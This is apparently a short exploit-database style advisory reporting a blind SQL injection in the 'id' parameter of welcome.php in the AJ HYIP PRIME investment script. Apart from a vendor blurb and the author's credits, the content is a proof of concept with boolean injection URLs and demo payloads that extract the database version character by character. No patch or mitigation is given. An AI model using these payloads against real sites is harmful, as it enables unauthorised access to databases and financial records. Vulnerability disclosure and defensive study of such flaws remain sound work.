30 lines
No EOL
867 B
Text
30 lines
No EOL
867 B
Text
AJ HYIP PRIME (welcome.php id) Blind SQL Injection Vulnerability
|
|
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
|
|
|
|
contact: sys-project[at]hotmail.com
|
|
website: http://www.hack0wn.com/
|
|
|
|
- site: http://www.ajsquare.com/products/ajhyip/index.php
|
|
|
|
- about AJ HYIP:
|
|
|
|
AJ HYIP is a complete financial tool with no technical
|
|
knowledge required to manage the site. AJ HYIP software
|
|
is the latest and most advanced HYIP Script with excellent
|
|
navigation features. Our HYIP Script can be easily customized
|
|
to accustom your needs with a potential to generate heavy revenues.
|
|
|
|
|
|
~~ [POC]
|
|
|
|
http://target/path/welcome.php?id=3 [bSQL]
|
|
http://target/path/welcome.php?id=3 and 1=1
|
|
http://target/path/welcome.php?id=3 and 1=2
|
|
|
|
~~ [DEMO]
|
|
|
|
http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=4
|
|
http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=5
|
|
|
|
|
|
__h0__ |